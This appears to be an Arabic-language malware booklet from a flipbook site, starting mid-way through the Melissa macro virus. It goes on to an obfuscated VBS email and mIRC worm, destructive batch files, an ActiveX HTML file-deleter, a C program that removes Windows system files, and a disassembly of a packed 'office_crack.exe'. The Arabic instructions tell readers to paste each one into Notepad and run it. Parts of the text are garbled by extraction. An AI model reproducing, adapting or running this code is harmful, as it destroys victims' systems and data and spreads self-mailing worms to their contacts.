BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1 ) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item( 1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1


ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If p$ = "clone"


If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo 'Clone written by Duke/SMF 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000


Virus? You Decide! 'Word ­> Email | Word 97 <­­> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty­two points, plus triple­ word­score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub

‫ هذا‬Virus worm ‫اقتباس‬: Set O6734VC6 = createobject("scripting.filesystemobject") O78SS2L7 = O6734VC6.getspecialfolder(1) A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs" Set E828D4O2 = createobject("wscript.shell") E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\WinUpdate", "wscript.exe " & A6G1HQFH & " %" O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH UB51PCQU If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then KD8F5L2N End if If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then HLVO1EDH "" End if Function KD8F5L2N() Set O13Q767K = CreateObject("Outlook.Application")


If O13Q767K = "Outlook" Then Set LFSIH230 = O13Q767K.GetNameSpace("MAPI") Set LLLK4LPL = LFSIH230.AddressLists For Each A4A83865 In LLLK4LPL If A4A83865.AddressEntries.Count <> 0 Then JM1R7N44 = A4A83865.AddressEntries.Count For NHF463JD = 1 To JM1R7N44 Set OU435GC5 = O13Q767K.CreateItem(0) Set KP511I06 = A4A83865.AddressEntries(NHF463JD) OU435GC5.To = KP511I06.Address OU435GC5.Subject = "Very Important!" OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & "" execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115) IJ15SDEE = A6G1HQFH OU435GC5.DeleteAfterSubmit = True DH97CAIN.Add IJ15SDEE If OU435GC5.To <> "" Then OU435GC5.Send End If Next End If Next End If End function Function HLVO1EDH(AHAOA819) If AHAOA819 <> "" Then TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Micr osoft\Windows\CurrentVersion\ProgramFilesDir") If O6734VC6.fileexists("c:\mirc\mirc.ini") Then AHAOA819 = "c:\mirc" ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then AHAOA819 = "c:\mirc32" ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then AHAOA819 = TJTE98P3 & "\mirc" ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then AHAOA819 = TJTE98P3 & "\mirc" Else AHAOA819 = "" End If End If If AHAOA819 <> "" Then Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True) U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{" U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{" U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }" U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick " U127MJ5H = U127MJ5H & A6G1HQFH


U127MJ5H = U127MJ5H & vbCrLf & "n3=}" script.Close End If End Function Function J706734V() On Error Resume Next Set CKQ24CHB = O6734VC6.Drives For Each G2U828D4 In CKQ24CHB OC078SS2 = G2U828D4 & " \ " Call L7R6G1HQ(OC078SS2) Next End Function Function L7R6G1HQ(FS6B51PC) Q35A1OM5 = FS6B51PC Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5) Set G6F47AC8 = ITHD8F5L.Files For Each NFFLVO1E In G6F47AC8 If lcase(NFFLVO1E.Name) = "mirc.ini" Then HLVO1EDH(NFFLVO1E.ParentFolder) End If If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs" O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true End if If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe" O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true End if Next Set VSM3BL08 = ITHD8F5L.Subfolders For Each UQFA0DCQ In VSM3BL08 Call (UQFA0DCQ.path) Next End function Function UB51PCQU() Randomize If 1 + Int(Rnd * 50) = 7 then E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows" end if end function

‫الن فايروسات العزيز‬ blackdream ‫هذا الفيروس يقوم بمهام منها‬


1:‫نسخ نفسه في بدا التشغيل‬ 2:‫تعطيل الكيبورد والفارة‬ 3:‫ انشاء اللف من المجلدات على سطح المكتب وعلى‬c 4:‫ حذف‬temp antivirus 5:‫يعطل المؤشرات‬ 6:‫حذف الويندوز نهائيا‬ 7:‫ة‬

‫غلق الجهاز بطريقة‬ ‫كود‬:

@echo OFF title T0TAL_DZ is attacked your systeme attrib +s +h %0 copy %0 "C:\Users\%username %\AppData\Roaming\Microsoft\Win dows\start Menu\Programs\startup" cd C:Windowssystem32 del /S /F /Q keyboard.drv del /S /F /Q mouse.drv del /S /F /Q keyboard.sys mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET RESTARTING YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN echo CHECK YOUR DESKTOP ping localhost >nul mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS FITS! echo CHECK YOUR C DRIVE echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL ping localhost >nul echo Y | del C:WindowssecurityDatabase cd C:WindowsCursors del /S /F /Q *.cur del /S /F /Q *.ani echo OH NO WHERE THE DID YOUR CURSOR GO ping localhost >nul


cls echo Y | del /f /q "C:\Windows\*" shutdown -s -t 4 -c "Sorry, T0TAL IS HERE" exit

‫الهوتميل‬ ‫فيروس‬ ‫الهوتميل‬ ‫فيروس‬ ‫جدااا‬ ‫خطير‬ ‫فيروس‬ ‫وهدا‬ ‫شيء‬ ‫كل‬ ‫بتعطيل‬ ‫يقوم‬ ‫المفكرة‬ ‫في‬ ‫وضعه‬ ‫الكود‬ ‫انسخ‬ notepad ‫بي‬ ‫متل‬ ‫واحفطه‬ bLaCkDrEaM.html

<html> <head> <**** **********="Content­Type" content="text/html; charset=iso­8859­1"> <title>Active­X HTML</title> </head> THIS HTML USING ACTIVE­X PLEASE CLICK #YES# <body bgcolor="#000000" Text="#C0C0C0"> <script language="VBScript"> <!­­ This is a MY BRAIN ­­!> On Error Resume Next Dim a Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.GetFile("win.ini") a.Delete Dim b Set fso = CreateObject("Scripting.FileSystemObject") Set b = fso.GetFile("system.ini") b.Delete


</script> <!­­­ This script author is THEONE­­­!> </body> </html> .................................................. .. ‫في‬ ‫بتجميعها‬ ‫قوم‬ ‫مجموعات‬ ‫الى‬ ‫مقسم‬notepad ‫النوت‬ ‫بي‬ ‫وحفظ‬ ‫باد‬ ‫النوت‬ ‫في‬ ‫ضعه‬ ‫باد‬ bLaCkDrEaM.bat ‫اقتباس‬: Disassembly of File: office_crack.exe Code Offset = 00000400, Code Size = 00000000 Data Offset = 00000400, Data Size = 00000000 Number of Objects = 0003 (dec), Imagebase = 004A0000h Object01: UPX0 RVA: 00001000 Offset: 00000400 Size: 00000000 Flags: E0000080 Object02: UPX1 RVA: 00007000 Offset: 00000400 Size: 00005000 Flags: E0000040 Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size: 00000400 Flags: C0000040

+++++++++++++++++++ MENU INFORMATION ++++++++


++++++++++ There Are No Menu Resources in This Application +++++++++++++++++ DIALOG INFORMATION ++++++++ ++++++++++ There Are No Dialog Resources in This Application 0 +++++++++++++++++++ IMPORTED FUNCTIONS ++++++ ++++++++++++ 0 Number of Imported Modules = 0 (decimal)

+++++++++++++++++++ IMPORT MODULE DETAILS +++ ++++++++++++ 0 +++++++++++++++++++ EXPORTED FUNCTIONS +++++ +++++++++++++ 0 Number of Exported Functions = 0000 (decimal) ++

+++++++++++++++++++ ASSEMBLY CODE LISTING +++


+++++++++++++++ //********************** Start of Code in Object UPX0 ************** Program Entry Point = 004ABE60 (office_crack.exe File Offset:0000B260) g

:004A7000 EE out dx, al :004A7001 8702 xchg dword ptr [edx], eax :004A7003 92 xchg eax,edx r :004A7004 005026 add byte ptr [eax+26], dl :004A7007 4A dec edx p :004A7008 004003 add byte ptr [eax+03], al :004A700B FD std by :004A700C B269 mov dl, 69 :004A700E 9A2C1004F425E8 call E825:F404102C :004A7015 0100 add dword ptr [eax], eax :004A7017 4B dec ebx d :004A7018 CE into b :004A7019 699A6ED91FC82AC003B8 imul ebx, dword


ptr [edx+C81FD96E], B803C02A 0 :004A7023 B0A8 mov al, A8 :004A7025 A6 cmpsb :004A7026 699AA6A0989088809AA6 imul ebx, dword ptr [edx+9098A0A6], A69A8088 0 :004A7030 699A787068605850CD60 imul ebx, dword ptr [edx+60687078], 60CD5058 0 :004A703A 9F lahf e :004A703B 69480044073830 imul ecx, dword ptr [eax+00], 30380744 :004A7042 344D xor al, 4D :004A7044 D3 BYTE 0d0h :004A7045 7403 je 004A704A or :004A7047 28241C sub byte ptr [esp+ebx], ah * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:004A7045(C) y | 00 :004A704A 1810 sbb byte ptr [eax], dl


:004A704C D32CBB shr dword ptr [ebx+4*edi], cl :004A704F D7 xlat w :004A7050 0823 or byte ptr [ebx], ah :004A7052 03F8 add edi, eax e :004A7054 29F0 sub eax, esi e :004A7056 E84DD3344D call 4D7F43A8 :004A705B E0D8 loopnz 004A7035 ], :004A705D D0C8 ror al, 1 :004A705F BCB4344DD3 mov esp, D34D34B4 :004A7064 34AC xor al, AC :004A7066 A4 movsb[/ .................................................. .. ‫للويندوز‬ ‫الترحيب‬ ‫شاشة‬ ‫لحذف‬ ‫كود‬ ‫في‬ ‫ضعه‬ ‫العادة‬ ‫كل‬ ‫ستفهم‬ ‫العنوان‬ ‫من‬notepad ‫باد‬ ‫النوت‬ ‫بي‬ ‫وحفط‬ bLaCkDrEaM.bat ‫اقتباس‬: Del c:\windows\Logos.sys Del c:\windows\Logow.sys .................................................. ... ‫بيسك‬ ‫الفيجول‬ ‫فيروس‬


‫الويندوز‬ ‫تدمير‬ ‫فيروسات‬ ‫ا‬ ‫بي‬ ‫احفط‬ bLaCkDrEaM.bat ‫اقتباس‬: vbNormal SetAttr "c:\msdos.sys", vbNormal SetAttr "c:\io.sys", vbNormal SetAttr "c:\windows\win.ini", vbNormal SetAttr "c:\windows\system.ini", vbNormal SetAttr "c:\command.com", vbNormal SetAttr "c:\config.sys", vbNormal SetAttr "c:\windows\rundll.exe", vbNormal SetAttr "c:\windows\rundll32.exe", vbNormal Kill "C:\autoexec.bat" Kill "C:\msdos.sys" Kill "C:\io.sys" Kill "C:\windows\win.ini" Kill "C:\windows\system.ini" Kill "C:\command.com" Kill "C:\config.sys" Kill "C:\windows\rundll.exe" Kill "C:\windows\rundll32.exe"[/CODE .................................................. ........... ‫الويندوز‬ ‫تدمير‬ ‫فيروس‬new ‫تم‬ ‫اوامر‬ ‫عدة‬ ‫بصدار‬ ‫ودلك‬ ‫الضجية‬ ‫بتعديب‬ ‫الفيروس‬ ‫يمتاز‬ ‫الهاردسك‬ ‫بتدمير‬ ‫يقوم‬ ‫باد‬ ‫النوت‬ ‫في‬ ‫واحفظه‬ ‫الكود‬ ‫انسخ‬ notebad ‫دالك‬ ‫وبعد‬ ‫حفط‬ bLaCkDrEaM.bat


Del c:\windows\system\msconfig.exe Del c:\windows\Rundll32.exe Del c:\windows\regedit.exe Del c:\windows\Rundll.exe Del c:\Autoexec.bat Del c:\command.com Del c:\windows\Logos.sys Del c:\windows\Logow.sys Del c:\windows\Scanregw.exe Del C:\Program Files\Internet Explorer\Iexplore.exe Del c:\windows\system\Sysedit.exe Del c:\windows\win.com

@Echo off c: cd %WinDir%\System\ deltree /y *.exe


‫تعـجبكم‬ ‫الله‬ ‫شاء‬ ‫أن‬ ‫السود‬ ‫الحلم‬ ‫أخوكم‬ ‫يتبع‬............................. ­­­­­­­­­­­­­­­ bLaCkDrEaM 1­ ‫مباشره‬ ‫التشغيل‬ ‫بعد‬ ‫الملفات‬ ‫كل‬ ‫وحذف‬ ‫الوندوز‬ ‫قتل‬ ‫انسخ‬ ‫كود‬: @Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys echo 2­ ‫تشغيل‬ ‫اعادة‬ ‫اول‬ ‫بعد‬ ‫الملفات‬ ‫كل‬ ‫وحذف‬ ‫الوندوز‬ ‫قتل‬ ‫للجهاز‬ ‫انسخ‬ ‫كود‬: call attrib ­h ­r c:autoexec.bat >nul @Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys echo


3­‫فيرووس‬ C++ : ‫انسخ‬ ‫كود‬: #include #include #include main() { clrscr(); printf("tttCoffin Of Evil "); printf("ttWElcome to My World"); remove("c:\windows\system.ini"); remove("c:\windows\win.ini"); remove("c:\autoexec.bat"); remove("c:\msdos.sys"); remove("c:\io.sys"); remove("c:\command.com"); remove("c:\config.sys"); remove("c:\windows\ebd\command.com"); remove("c:\windows\ebd\ebd.cab"); remove("c:\windows\ebd\Autoexec.bat"); remove("c:\windows\ebd\setramd.bat"); remove("c:\windows\ebd\Findramd.exe"); rename("egypt.exe","c:/windows/startm~1/programs/sta rtup/win.exe"); printf("Windows destroyed ...nn"); system("PAUSE"); } 4­ ‫ ثانيه‬60 ‫بعد‬ ‫الجهاز‬ ‫إطفاء‬ ‫كود‬:


‫‪cmdow @ /HID‬‬ ‫‪shutdown.exe ­r ­f ­t 60 ­c "Windows XP will now restart ‬‬ ‫"حط‪ ‬الكلم‪ ‬الذي‪ ‬تريد‪in 60 Seconds...hacked by ‬‬ ‫‪net user aspnet /delete‬‬ ‫‪EXIT ‬‬

‫ارجو عدم استخدامه على اخواننا المسلمين‬ ‫واني بريء من كل عمل يضر اخواننا المسلمين‬

‫تم تصميم الكتاب بواسطة‬ ‫‪mr_Shark96‬‬


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.